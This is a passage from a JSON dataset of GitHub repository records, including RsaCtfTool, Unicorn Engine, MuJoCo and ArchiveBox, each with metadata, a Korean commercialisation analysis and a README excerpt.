issues](https://img.shields.io/github/issues/RsaCtfTool/RsaCtfTool.svg)](https://github.com/RsaCtfTool/RsaCtfTool/issues)\n[![GitHub forks](https://img.shields.io/github/forks/RsaCtfTool/RsaCtfTool.svg)](https://github.com/RsaCtfTool/RsaCtfTool/network)\n[![GitHub stars](https://img.shields.io/github/stars/RsaCtfTool/RsaCtfTool.svg)](https://github.com/RsaCtfTool/RsaCtfTool/stargazers)\n[![GitHub license](https://img.shields.io/github/license/RsaCtfTool/RsaCtfTool.svg)]","composite_score":0.0616,"license_safety_tag":"safe"},{"name":"unicorn-engine/unicorn","github_url":"https://github.com/unicorn-engine/unicorn","stars":6,"language":"C","license":"gpl-2.0","abandonment_months":0,"description":"# Unicorn Engine 상용화 분석\n\n## 왜 보물인가\n컴퓨터가 다른 컴퓨터의 명령어를 흉내내서 실행할 수 있는 기술로, 보안 점검이나 악성코드 분석을 효율적으로 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **클라우드 기반 악성코드 검사 SaaS**: 파일 업로드 후 자동으로 위험한 프로그램인지 분석해주는 온라인 서비스\n2. **기업용","readme_excerpt":"Unicorn Engine\n==============\n\n[![pypi downloads](https://pepy.tech/badge/unicorn)](https://pepy.tech/project/unicorn)\n[![Fuzzing Status](https://oss-fuzz-build-logs.storage.googleapis.com/badges/unicorn.svg)](https://bugs.chromium.org/p/oss-fuzz/issues/list?sort=-opened&can=1&q=proj:unicorn)\n\n**LOOKING FOR CONTRIBUTORS!** See [this](https://github.com/unicorn-engine/unicorn/issues/2237).\n==============\n\n<p align=\"center\">\n<img width=\"250\" src=\"docs/unicorn-logo.png\">\n</p>\n\nUnicorn is a lightweight, multi-platform, multi-architecture CPU emulator framework, based on [QEMU](http://qemu.org).\n\nUnicorn offers some unparalleled features:\n\n- Multi-architecture: ARM, ARM64 (ARMv8), M68K, MIPS, PowerPC, RISCV, SPARC, S390X, TriCore and X86 (16, 32, 64-bit)\n- Clean/simple/lightweight/intuitive architecture-neutral API\n- Implemented in pure C language, with bindings for Crystal, Clojure, Visual Basic, Perl, Rust, Ruby, Python, Java, .NET, Go, Delphi/Free Pascal, Haskell, Pharo, Lua and Zig.\n- N","composite_score":0.0616,"license_safety_tag":"restricted"},{"name":"myclabs/DeepCopy","github_url":"https://github.com/myclabs/DeepCopy","stars":9,"language":"PHP","license":"mit","abandonment_months":5,"description":"# DeepCopy 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터를 완벽하게 복사하는 기술로, 소프트웨어에서 데이터 손상을 방지하는 필수 기능입니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 관리 SaaS**: 사용자 정보를 안전하게 백업하고 복원하는 클라우드 서비스\n2. **내부 업무 도구**: 회사 데이터베이스에서 테스트용 안전한 사본을 만드는 시스템","readme_excerpt":"# DeepCopy\n\nDeepCopy helps you create deep copies (clones) of your objects. It is designed to handle cycles in the association graph.\n\n[![Total Downloads](https://poser.pugx.org/myclabs/deep-copy/downloads.svg)](https://packagist.org/packages/myclabs/deep-copy)\n[![Integrate](https://github.com/myclabs/DeepCopy/actions/workflows/ci.yaml/badge.svg?branch=1.x)](https://github.com/myclabs/DeepCopy/actions/workflows/ci.yaml)\n\n## Table of Contents\n\n1. [How](#how)\n1. [Why](#why)\n    1. [Using simply `clone`](#using-simply-clone)\n    1. [Overriding `__clone()`](#overriding-__clone)\n    1. [With `DeepCopy`](#with-deepcopy)\n1. [How it works](#how-it-works)\n1. [Going further](#going-further)\n    1. [Matchers](#matchers)\n        1. [Property name](#property-name)\n        1. [Specific property](#specific-property)\n        1. [Type](#type)\n    1. [Filters](#filters)\n        1. [`SetNullFilter`](#setnullfilter-filter)\n        1. [`KeepFilter`](#keepfilter-filter)\n        1. [`DoctrineCollectionFilter","composite_score":0.0616,"license_safety_tag":"safe"},{"name":"pemistahl/grex","github_url":"https://github.com/pemistahl/grex","stars":13,"language":"Rust","license":"Apache-2.0","abandonment_months":3,"description":"# pemistahl/grex 분석 리포트\n\n## 왜 보물인가\n복잡한 패턴을 자동으로 간단한 규칙으로 변환해주는 도구로, 데이터 검증이 필요한 모든 비즈니스에서 반복적인 작업을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **고객 정보 검증 SaaS**: 전자상거래 플랫폼이 주문 데이터(이메일, 전화번호, 주소)의 정확성을 자동으로 검증하","readme_excerpt":"<div align=\"center\">\n\n  ![grex](https://raw.githubusercontent.com/pemistahl/grex/main/logo.png)\n\n  <br>\n\n  [![rust build status](https://github.com/pemistahl/grex/actions/workflows/rust-build.yml/badge.svg)](https://github.com/pemistahl/grex/actions/workflows/rust-build.yml)\n  [![python build status](https://github.com/pemistahl/grex/actions/workflows/python-build.yml/badge.svg)](https://github.com/pemistahl/grex/actions/workflows/python-build.yml)\n  [![docs.rs](https://docs.rs/grex/badge.svg)](https://docs.rs/grex)\n  [![codecov](https://codecov.io/gh/pemistahl/grex/branch/main/graph/badge.svg)](https://codecov.io/gh/pemistahl/grex)\n  [![dependency status](https://deps.rs/crate/grex/1.4.6/status.svg)](https://deps.rs/crate/grex/1.4.6)\n  [![demo](https://img.shields.io/badge/-Demo%20Website-orange?logo=HTML5&labelColor=white)](https://pemistahl.github.io/grex-js/)\n  \n  [![downloads](https://img.shields.io/crates/d/grex.svg)](https://crates.io/crates/grex)\n  [![crates.io](https://img.shi","composite_score":0.0614,"license_safety_tag":"safe"},{"name":"deepmind/mujoco","github_url":"https://github.com/deepmind/mujoco","stars":8,"language":"C++","license":"apache-2.0","abandonment_months":0,"description":"# MuJoCo 저장소 분석\n\n## 왜 보물인가\n로봇과 물리 시뮬레이션 분야에서 가장 널리 사용되는 오픈소스 엔진으로, DeepMind가 공식 지원하며 학계와 산업계 모두에서 신뢰받고 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 로봇 교육 플랫폼 SaaS**\n- 학생들이 웹 브라우저에서 가상 로봇을 제어하고 학습하는 구독 서비스\n- 학교/학원이 월 5~","readme_excerpt":"<h1>\n  <a href=\"#\"><img alt=\"MuJoCo\" src=\"banner.png\" width=\"100%\"/></a>\n</h1>\n\n<p>\n  <a href=\"https://github.com/google-deepmind/mujoco/actions/workflows/build.yml?query=branch%3Amain\" alt=\"GitHub Actions\">\n    <img src=\"https://img.shields.io/github/actions/workflow/status/google-deepmind/mujoco/build.yml?branch=main\">\n  </a>\n  <a href=\"https://mujoco.readthedocs.io/\" alt=\"Documentation\">\n    <img src=\"https://readthedocs.org/projects/mujoco/badge/?version=latest\">\n  </a>\n  <a href=\"https://github.com/google-deepmind/mujoco/blob/main/LICENSE\" alt=\"License\">\n    <img src=\"https://img.shields.io/github/license/google-deepmind/mujoco\">\n  </a>\n</p>\n\n**MuJoCo** stands for **Mu**lti-**Jo**int dynamics with **Co**ntact. It is a\ngeneral purpose physics engine that aims to facilitate research and development\nin robotics, biomechanics, graphics and animation, machine learning, and other\nareas which demand fast and accurate simulation of articulated structures\ninteracting with their environment","composite_score":0.0613,"license_safety_tag":"safe"},{"name":"heilla/SecurityTesting","github_url":"https://github.com/heilla/SecurityTesting","stars":6,"language":"Python","license":"unknown","abandonment_months":3,"description":"# SecurityTesting 저장소 분석\n\n## 왜 보물인가\n기업과 개인의 중요한 정보를 지키기 위해 보안 시스템을 미리 테스트하고 약점을 찾아내는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 온라인 금융·의료 서비스 제공업체가 고객 데이터 보호를 위해 정기적으로 사용\n- **내부 업무 도구**: 중소 기업의 IT팀이 자사 시스템","readme_excerpt":"\n","composite_score":0.0612,"license_safety_tag":"unknown"},{"name":"mehmetozkaya/Design-Microservices-Architecture-with-Patterns-Principles","github_url":"https://github.com/mehmetozkaya/Design-Microservices-Architecture-with-Patterns-Principles","stars":5,"language":"C#","license":"unknown","abandonment_months":3,"description":"# Design-Microservices-Architecture-with-Patterns-Principles 분석\n\n## 왜 보물인가\n복잡한 소프트웨어 시스템을 작은 단위로 나누어 관리하는 설계 방법론을 정리한 학습 자료로, 대규모 IT 프로젝트의 성공률을 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 전자상거래 플랫폼에서 결제","readme_excerpt":"# Design Microservices Architecture with Patterns & Principles\n\nWe’re going to learn how to **Design Microservices Architecture with using Design Patterns, Principles and the Best Practices.** We will using the right architecture design patterns and techniques.\n\n**UDEMY COURSE WITH DISCOUNTED - Step by Step Design of this Repository -> https://www.udemy.com/course/design-microservices-architecture-with-patterns-principles/?couponCode=MARC26**\n\nBy the end of the course, you will Learn how to **handle millions of request with designing system for high availability, high scalability, low latency, and resilience to network failures** on microservices distributed architectures.\n\nSee the overall picture of **implementations on microservices architecture** on real-world **e-commerce microservices** project;\n\n![Image](https://github.com/user-attachments/assets/6bc38c92-0a80-4c43-8a8f-79b519bb2be5)\n\nThis course is will be the journey of software architecture design with **step by step evolving ","composite_score":0.0612,"license_safety_tag":"unknown"},{"name":"yoshiko2/AV_Data_Capture","github_url":"https://github.com/yoshiko2/AV_Data_Capture","stars":7,"language":"Python","license":"GPL-3.0","abandonment_months":1,"description":"# yoshiko2/AV_Data_Capture 분석\n\n## 왜 보물인가\n영상 자료의 정보를 자동으로 수집하고 정리해주는 도구로, 대량의 콘텐츠를 관리하는 기관이나 기업에게 수작업 시간을 크게 줄여줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **미디어 관리 SaaS**: 영상 라이브러리를 보유한 기업들에게 자동 메타데이터 수집 서비스로 제공\n2. **","readme_excerpt":"<h1 align=\"center\">Movie Data Capture</h1>\r\n\r\n## 网站\r\n[www.mvdc.top](https://www.mvdc.top)\r\n\r\n## 核心代码开源\r\n \r\n","composite_score":0.0612,"license_safety_tag":"restricted"},{"name":"pirate/bookmark-archiver","github_url":"https://github.com/pirate/bookmark-archiver","stars":6,"language":"Python","license":"mit","abandonment_months":0,"description":"# Bookmark Archiver 분석\n\n## 왜 보물인가\n인터넷에서 저장한 링크들이 사라지지 않도록 자동으로 백업해주는 도구로, 나중에 찾아보고 싶은 웹페이지를 영구적으로 보관할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독 방식의 클라우드 북마크 백업 서비스로 개인 사용자와 기업에 제공\n2. **내부 업무 도구**: ","readme_excerpt":"<div align=\"center\" style=\"text-align: center; width: 100%\">\n<img src=\"https://archivebox.io/icon.png\" height=\"90px\"/>\n<h1>ArchiveBox<br/><sub>Open-source self-hosted web archiving.</sub></h1>\n\n<br/>\n\n▶️ <a href=\"https://github.com/ArchiveBox/ArchiveBox/wiki/Quickstart\">Quickstart</a> | <a href=\"https://demo.archivebox.io\">Demo</a> | <a href=\"https://github.com/ArchiveBox/ArchiveBox\">GitHub</a> | <a href=\"https://github.com/ArchiveBox/ArchiveBox/wiki\">Documentation</a> | <a href=\"#background--motivation\">Info & Motivation</a> | <a href=\"https://github.com/ArchiveBox/ArchiveBox/wiki/Web-Archiving-Community\">Community</a>\n\n<br/>\n\n<!--<a href=\"http://webchat.freenode.net?channels=ArchiveBox&uio=d4\"><img src=\"https://img.shields.io/badge/Community_chat-IRC-%2328A745.svg\"/></a>-->\n\n<a href=\"https://github.com/ArchiveBox/ArchiveBox/blob/dev/LICENSE\"><img src=\"https://img.shields.io/badge/Open_source-MIT-green.svg?logo=git&logoColor=green\"/></a> <a href=\"https://github.com/ArchiveBox/ArchiveB","composite_score":0.061,"license_safety_tag":"safe"},{"name":"PorkStudios/FarPlaneTwo","github_url":"https://github.com/PorkStudios/FarPlaneTwo","stars":8,"language":"Java","license":"NOASSERTION","abandonment_months":3,"description":"# PorkStudios/FarPlaneTwo 분석\n\n## 왜 보물인가\n게임이나 3D 그래픽 애플리케이션에서 멀리 있는 물체까지 자연스럽게 표현하는 기술로, 영상 품질과 성능을 동시에 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발 엔진 플러그인 SaaS**: 개발자가 구독해서 사용하는 고급 그래픽 기능 제공 서비스\n2. **3D 건축 ","readme_excerpt":"# FarPlaneTwo\n[![Build Status](https://jenkins.daporkchop.net/job/PorkStudios/job/FarPlaneTwo/job/master/badge/icon)](https://jenkins.daporkchop.net/job/PorkStudios/job/FarPlaneTwo/)\n![GitHub code size in bytes](https://img.shields.io/github/languages/code-size/PorkStudios/FarPlaneTwo)\n![Lines of code](https://img.shields.io/tokei/lines/github/PorkStudios/FarPlaneTwo)\n[![Discord](https://img.shields.io/discord/428813657816956929?color=7289DA&label=discord)](https://discord.gg/FrBHHCk)\n[![Patreon badge](https://img.shields.io/badge/dynamic/json?color=e64413&label=patreon&query=data.attributes.patron_count&suffix=%20patrons&url=https%3A%2F%2Fwww.patreon.com%2Fapi%2Fcampaigns%2F727078)](https://www.patreon.com/DaPorkchop_)\n\nThis is a Minecraft mod which implements a Level-of-Detail (LoD) terrain renderer into the game.\nThe name is in reference to [Foghrye4's CWGFarPlaneView](https://www.curseforge.com/minecraft/mc-mods/cwg-far-plane-view), which is an addon for CubicWorldGen (which, in tu","composite_score":0.061,"license_safety_tag":"unknown"},{"name":"Mayccoll/Gogh","github_url":"https://github.com/Mayccoll/Gogh","stars":8,"language":"Shell","license":"MIT","abandonment_months":2,"description":"# Mayccoll/Gogh 저장소 분석\n\n## 왜 보물인가\n예술 작품이나 이미지를 아름답게 변환하는 기술로, 창작 도구나 미디어 플랫폼에 바로 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **이미지 편집 SaaS**: 일반인이 사진을 유명 화가의 화풍으로 변환하는 온라인 서비스\n2. **소셜 미디어 내부 도구**: 인스타그램·틱톡 같은 플랫폼의","readme_excerpt":"<h1 align=\"center\">\n  Gogh\n</h1>\n\n<div align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/Gogh-Co/Gogh/master/.images/gogh/Gogh-logo-dark.png\" alt=\"Gogh\" width=\"100%\">\n</div>\n\n<br>\n\n<div align=\"center\">\n🔸🔸🔸 <a href=\"http://Gogh-Co.github.io/Gogh\"> Visit the Website </a> 🔸🔸🔸\n</div>\n\n## Color Scheme Implementer for Terminals\n\nGogh is a collection of color schemes for various terminal emulators, including Gnome Terminal, Pantheon Terminal, Tilix, and XFCE4 Terminal. These schemes are designed to make your terminal more visually appealing and improve your productivity by providing a better contrast and color differentiation. (This fork of Gogh includes a color scheme named \"Vaombe\".)\n\nThe inspiration for Gogh came from the clean and minimalistic design of Elementary OS, but the project has since grown to include a variety of unique and beautiful options. Not only does Gogh work on Linux systems, but it's also compatible with iTerm on macOS, providing a consistent and visually ap","composite_score":0.061,"license_safety_tag":"safe"},{"name":"beautify-web/js-beautify","github_url":"https://github.com/beautify-web/js-beautify","stars":5,"language":"JavaScript","license":"mit","abandonment_months":1,"description":"# js-beautify 상용화 분석\n\n## 왜 보물인가\n웹사이트의 복잡하게 뭉쳐있는 코드를 깔끔하게 정렬해주는 필수 도구로, 개발자와 비개발자 모두 필요로 합니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 코드 정렬 SaaS**: 웹 브라우저에서 바로 코드를 붙여넣고 정렬하는 유료 서비스 (고급 기능은 유료화)\n2. **웹 개발 회사 내부 도구**: ","readme_excerpt":"<p align=\"center\"><img src=\"https://raw.githubusercontent.com/beautifier/js-beautify/7db71fc/web/wordmark-light.svg\" height=\"200px\" align=\"center\" alt=\"JS Beautifier\"/></p>\n\n<p align=\"center\"><a href=\"https://github.com/beautifier/js-beautify/actions/workflows/main.yml\"><img alt=\"CI\" src=\"https://github.com/beautifier/js-beautify/workflows/CI/badge.svg\"/></a>&#32;<a href=\"https://greenkeeper.io/\" target=\"_blank\"><img alt=\"Greenkeeper badge\" src=\"https://badges.greenkeeper.io/beautifier/js-beautify.svg\"/></a></p>\n\n<p align=\"center\"><a href=\"https://pypi.python.org/pypi/jsbeautifier\" target=\"_blank\"><img alt=\"PyPI version\" src=\"https://img.shields.io/pypi/v/jsbeautifier.svg\"/></a>&#32;<a href=\"https://cdnjs.com/libraries/js-beautify\" target=\"_blank\"><img alt=\"CDNJS version\" src=\"https://img.shields.io/cdnjs/v/js-beautify.svg\"/></a>&#32;<a href=\"https://www.npmjs.com/package/js-beautify\" target=\"_blank\"><img alt=\"NPM @latest\" src=\"https://img.shields.io/npm/v/js-beautify.svg\"/></a>&#32;<a","composite_score":0.0609,"license_safety_tag":"safe"},{"name":"antfu/vitesse-webext","github_url":"https://github.com/antfu/vitesse-webext","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":3,"description":"# vitesse-webext 분석 보고서\n\n## 왜 보물인가\n웹 브라우저 확장 프로그램을 만드는 과정을 획기적으로 단순화해주는 개발 틀로, 일반 웹사이트 개발처럼 쉽게 브라우저 확장 프로그램을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹사이트 분석, 글쓰기 보조, 이미지 편집 등을 브라우저 확장으로 제공하는 구독 서비스","readme_excerpt":"# WebExtension Vite Starter\n\nA [Vite](https://vitejs.dev/) powered WebExtension ([Chrome](https://developer.chrome.com/docs/extensions/reference/), [FireFox](https://addons.mozilla.org/en-US/developers/), etc.) starter template.\n\n<p align=\"center\">\n<sub>Popup</sub><br/>\n<img width=\"655\" src=\"https://user-images.githubusercontent.com/11247099/126741643-813b3773-17ff-4281-9737-f319e00feddc.png\"><br/>\n<sub>Options Page</sub><br/>\n<img width=\"655\" src=\"https://user-images.githubusercontent.com/11247099/126741653-43125b62-6578-4452-83a7-bee19be2eaa2.png\"><br/>\n<sub>Inject Vue App into the Content Script</sub><br/>\n<img src=\"https://user-images.githubusercontent.com/11247099/130695439-52418cf0-e186-4085-8e19-23fe808a274e.png\">\n</p>\n\n## Features\n\n- ⚡️ **Instant HMR** - use **Vite** on dev (no more refresh!)\n- 🥝 Vue 3 - Composition API, [`<script setup>` syntax](https://github.com/vuejs/rfcs/blob/master/active-rfcs/0040-script-setup.md) and more!\n- 💬 Effortless communications - powered by [`we","composite_score":0.0609,"license_safety_tag":"safe"},{"name":"deployphp/deployer","github_url":"https://github.com/deployphp/deployer","stars":5,"language":"PHP","license":"mit","abandonment_months":0,"description":"# Deployer 저장소 분석\n\n## 왜 보물인가\n웹사이트나 애플리케이션을 자동으로 배포(업데이트 배포)해주는 도구로, 개발팀이 반복적인 수작업을 완전히 없앨 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **웹 호스팅 서비스**: 고객들이 자신의 웹사이트를 자동으로 배포·업데이트할 수 있는 관리 대시보드 제공\n2. **개발팀 협업 도구**: 여러 개발자","readme_excerpt":"<h1>\n    <a href=\"https://deployer.org\">\n        <picture>\n            <source media=\"(prefers-color-scheme: dark)\" srcset=\"https://deployer.org/img/logo-white.svg\" height=\"30\">\n            <img src=\"https://deployer.org/img/logo.svg\" alt=\"Deployer Logo\" height=\"30\">\n        </picture>\n    </a>\n    Deployer\n</h1>\n<p>The PHP deployment tool with support for popular frameworks out of the box.</p>\n\n<p align=\"center\"><br><br><a href=\"https://deployer.org\"><img src=\"https://medv.io/assets/deployer/deployer.gif\" alt=\"Deployer Screenshot\" width=\"530\"></a><br><br><br></p>\n\n---\n\n<p style=\"font-size: 21px; color:black;\">\n    Browser testing via<br> \n    <a href=\"https://www.testmu.ai\" target=\"_blank\">\n        <picture>\n            <source media=\"(prefers-color-scheme: dark)\" srcset=\".github/testmu-black-logo.png\" width=\"800\">\n            <img src=\".github/testmu-white-logo.png\" alt=\"Testmu AI\" width=\"800\">\n        </picture>\n    </a>\n</p>\n\n---\n\n<a href=\"https://github.com/deployphp/deployer/acti","composite_score":0.0608,"license_safety_tag":"safe"},{"name":"nlp-compromise/compromise","github_url":"https://github.com/nlp-compromise/compromise","stars":5,"language":"JavaScript","license":"mit","abandonment_months":3,"description":"# Compromise 저장소 분석\n\n## 왜 보물인가\n복잡한 문법 규칙을 자동으로 이해하고 처리하는 기술로, 챗봇·검색·번역 등 언어 관련 서비스의 핵심 엔진으로 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 일반인을 위한 AI 글쓰기 검증 도구나 자동 요약 서비스에 내장하여 정확도 향상\n2. **내부 업무 도구**: 기","readme_excerpt":"<div align=\"center\">\n  <img height=\"15px\" src=\"https://user-images.githubusercontent.com/399657/68221862-17ceb980-ffb8-11e9-87d4-7b30b6488f16.png\"/>\n  <div><b>compromise</b></div>\n  <img src=\"https://user-images.githubusercontent.com/399657/68222691-6597f180-ffb9-11e9-8a32-a7f38aa8bded.png\"/>\n  <div>modest natural language processing</div>\n  <div><code>npm install compromise</code></div>\n  <div align=\"center\">\n    <sub>\n      by\n      <a href=\"https://spencermounta.in/\">Spencer Kelly</a> and\n      <a href=\"https://github.com/spencermountain/compromise/graphs/contributors\">\n        many contributors\n      </a>\n    </sub>\n  </div>\n  <img height=\"22px\" src=\"https://user-images.githubusercontent.com/399657/68221862-17ceb980-ffb8-11e9-87d4-7b30b6488f16.png\"/>\n</div>\n\n<div align=\"center\">\n  <div>\n    <a href=\"https://npmjs.org/package/compromise\">\n    <img src=\"https://img.shields.io/npm/v/compromise.svg?style=flat-square\" />\n  </a>\n  <a href=\"https://codecov.io/gh/spencermountain/compromise","composite_score":0.0605,"license_safety_tag":"safe"},{"name":"Xilinx/Vitis-Tutorials","github_url":"https://github.com/Xilinx/Vitis-Tutorials","stars":5,"language":"C","license":"MIT","abandonment_months":2,"description":"# Xilinx/Vitis-Tutorials 분석\n\n## 왜 보물인가\n복잡한 반도체 설계 과정을 배우고 싶은 사람들을 위해 대형 기술 기업이 직접 만든 무료 학습 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 반도체 엔지니어 대상 온라인 교육 플랫폼으로 개발해 월 구독료 수취\n2. **내부 업무 도구**: 대학이나 기업 내 반도","readme_excerpt":"<p class=\"sphinxhide\" align=\"right\"><a>English</a> | <a href=\"docs-jp/README.md\">日本語</a></p>\n<table class=\"sphinxhide\" style=\"width:100%;\">\n  <tr>\n    <td align=\"center\">\n      <picture>\n        <source media=\"(prefers-color-scheme: dark)\" srcset=\"https://raw.githubusercontent.com/Xilinx/Image-Collateral/main/logo-white-text.png\">\n        <img alt=\"AMD logo\" src=\"https://raw.githubusercontent.com/Xilinx/Image-Collateral/main/xilinx-logo.png\" width=\"30%\">\n      </picture>\n      <h1>AMD Vitis™ In-Depth Tutorials</h1>\n      <a href=\"https://www.amd.com/en/products/software/adaptive-socs-and-fpgas/vitis.html\">See Vitis™ Development Environment on amd.com</a>\n    </td>\n  </tr>\n</table>\n\n## Unlocking a New Design Experience For All Developers\n\nThe AMD [Vitis™ Unified Software Platform](https://www.amd.com/en/products/software/adaptive-socs-and-fpgas/vitis.html) is a development environment for developing designs that include FPGA fabric, Arm® processor subsystems, and AI Engines. The Vitis t","composite_score":0.0603,"license_safety_tag":"safe"},{"name":"Deletescape-Media/Lawnchair","github_url":"https://github.com/Deletescape-Media/Lawnchair","stars":5,"language":"Java","license":"gpl-3.0","abandonment_months":0,"description":"# Lawnchair 프로젝트 분석\n\n## 왜 보물인가\n스마트폰 홈 화면을 자신의 취향대로 꾸밀 수 있는 무료 커스터마이징 도구로, 기존 휴대폰 기본 설정의 제약에서 벗어나고 싶은 사용자들의 니즈를 충족시킵니다.\n\n## 어디에 쓸 수 있나\n1. **휴대폰 테마 커스터마이징 SaaS**: 프리미엄 디자인 테마 팩과 고급 기능을 월 구독으로 제공하는 유료 서비","readme_excerpt":"# Lawnchair 16\n\n[![Build debug APK](https://github.com/LawnchairLauncher/lawnchair/actions/workflows/ci.yml/badge.svg)](https://github.com/LawnchairLauncher/lawnchair/actions/workflows/ci.yml)\n[![Build release APK](https://github.com/LawnchairLauncher/lawnchair/actions/workflows/release_update.yml/badge.svg)](https://github.com/LawnchairLauncher/lawnchair/actions/workflows/release_update.yml)\n[![Crowdin](https://badges.crowdin.net/e/188ba69d884418987f0b7f1dd55e3a4e/localized.svg)](https://lawnchair.crowdin.com/lawnchair)\n[![OpenCollective](https://img.shields.io/opencollective/all/lawnchair?label=financial%20contributors&logo=open-collective)](https://opencollective.com/lawnchair)\n[![Telegram](https://img.shields.io/endpoint?url=https%3A%2F%2Ftg.sumanjay.workers.dev%2Flccommunity)](https://t.me/lccommunity)\n[![Discord](https://img.shields.io/discord/803299970169700402?label=server&logo=discord)](https://discord.gg/3x8qNWxgGZ)\n[![GitHub Downloads](https://img.shields.io/github/downloads","composite_score":0.0603,"license_safety_tag":"restricted"},{"name":"maximegris/angular-electron","github_url":"https://github.com/maximegris/angular-electron","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":1,"description":"# Angular-Electron 저장소 분석\n\n## 왜 보물인가\nWindows, Mac, Linux에서 모두 작동하는 데스크톱 애플리케이션을 한 번에 만들 수 있는 기술 기반이라 개발 비용과 시간을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 회계팀이 사용하는 영수증 정리 프로그램, 인사팀의 근무 기록 관리 소프트","readme_excerpt":"[![Angular Logo](https://www.vectorlogo.zone/logos/angular/angular-icon.svg)](https://angular.io/) [![Electron Logo](https://www.vectorlogo.zone/logos/electronjs/electronjs-icon.svg)](https://electronjs.org/)\n\n![Maintained][maintained-badge]\n[![Make a pull request][prs-badge]][prs]\n[![License][license-badge]](LICENSE.md)\n\n[![Linux Build][linux-build-badge]][linux-build]\n[![MacOS Build][macos-build-badge]][macos-build]\n[![Windows Build][windows-build-badge]][windows-build]\n\n[![Watch on GitHub][github-watch-badge]][github-watch]\n[![Star on GitHub][github-star-badge]][github-star]\n[![Tweet][twitter-badge]][twitter]\n\n# Introduction\n\nBootstrap and package your project with Angular 21 and Electron 41 (Typescript + SASS + Hot Reload) for creating Desktop applications.\n\nCurrently runs with:\n\n- Angular v21.2.10\n- Electron v41.3.0\n\nWith this sample, you can:\n\n- Run your app in a local development environment with Electron & Hot reload\n- Run your app in a production environment\n- Execute your tes","composite_score":0.0601,"license_safety_tag":"safe"},{"name":"aws-samples/serverless-rules","github_url":"https://github.com/aws-samples/serverless-rules","stars":33,"language":"Go","license":"MIT-0","abandonment_months":3,"description":"# aws-samples/serverless-rules 보물 분석\n\n## 왜 보물인가\n복잡한 클라우드 시스템을 간단한 규칙으로 자동으로 관리할 수 있는 기술로, 기업이 번거로운 수작업을 줄이고 비용을 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 클라우드 자동관리 SaaS**\n- 중소기업의 AWS 환경을 자동으로 모니터링하고 최적화하는 구독형 ","readme_excerpt":"Serverless Rules\n================\n\nThe __Serverless Rules__ are a compilation of rules to validate infrastructure as code template against recommended practices. This currently provides a module for [cfn-lint](https://github.com/aws-cloudformation/cfn-python-lint) and a plugin for [tflint](https://github.com/terraform-linters/tflint).\n\nYou can use those rules to get quick feedback on recommended practices while building a serverless application, as part of automated code review process, or as guardrails before deploying to production.\n\n<p align=\"center\">\n\n**[📜Documentation](https://awslabs.github.io/serverless-rules/)** | **[🐍PyPi](https://pypi.org/project/cfn-lint-serverless/)**\n\n</p>\n\n__PUBLIC PREVIEW__: this project is currently in __public preview__ to get feedback from the serverless community. APIs, tools, and rules might change between the beginning of public preview and version 1.\n\nYou can find a list of currently supported rules [in the documentation](https://awslabs.github.io","composite_score":0.06,"license_safety_tag":"safe"},{"name":"w0rp/ale","github_url":"https://github.com/w0rp/ale","stars":7,"language":"Vim Script","license":"bsd-2-clause","abandonment_months":0,"description":"# w0rp/ale 분석 보고서\n\n## 왜 보물인가\n코드 작성할 때 발생하는 오류를 자동으로 찾아주는 똑똑한 검사 도구로, 개발자들의 작업 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 온라인 코드 편집기나 개발 협업 플랫폼에 내장하여 사용자들이 실시간으로 오류를 감지하고 수정할 수 있는 기능 제공\n2. **내부","readme_excerpt":"# Asynchronous Lint Engine\n\n[![Vim](https://img.shields.io/badge/VIM-%2311AB00.svg?style=for-the-badge&logo=vim&logoColor=white)](https://www.vim.org/) [![Neovim](https://img.shields.io/badge/NeoVim-%2357A143.svg?&style=for-the-badge&logo=neovim&logoColor=white)](https://neovim.io/) [![CI](https://img.shields.io/github/actions/workflow/status/dense-analysis/ale/main.yml?branch=master&label=CI&logo=github&style=for-the-badge)](https://github.com/dense-analysis/ale/actions?query=event%3Apush+workflow%3ACI+branch%3Amaster++) [![Join the Dense Analysis Discord server](https://img.shields.io/badge/chat-Discord-5865F2?style=for-the-badge&logo=appveyor)](https://discord.gg/5zFD6pQxDk)\n\n![ALE Logo by Mark Grealish - https://www.bhalash.com/](https://user-images.githubusercontent.com/3518142/59195920-2c339500-8b85-11e9-9c22-f6b7f69637b8.jpg)\n\nALE (Asynchronous Lint Engine) is a plugin providing linting (syntax checking\nand semantic errors) in Neovim 0.7.0+ and Vim 8.2+ while you edit your text ","composite_score":0.06,"license_safety_tag":"safe"},{"name":"201206030/novel-plus","github_url":"https://github.com/201206030/novel-plus","stars":27,"language":"Java","license":"Apache-2.0","abandonment_months":0,"description":"# novel-plus 저장소 분석\n\n## 왜 보물인가\n누구나 쉽게 온라인 소설 플랫폼을 만들고 운영할 수 있는 완성된 시스템입니다.\n\n## 어디에 쓸 수 있나\n1. **웹소설 구독 서비스**: 독자들이 월정액을 내고 소설을 읽는 구독형 플랫폼으로 운영\n2. **출판사 내부 관리 도구**: 작가, 편집자, 독자 관리를 한 곳에서 처리하는 업무 시스템\n3. ","readme_excerpt":"<p align=\"center\">\n    <a href=\"https://cloud.tencent.com/act/cps/redirect?redirect=2446&cps_key=736e609d66e0ac4e57813316cec6fd0b&from=console\"><img 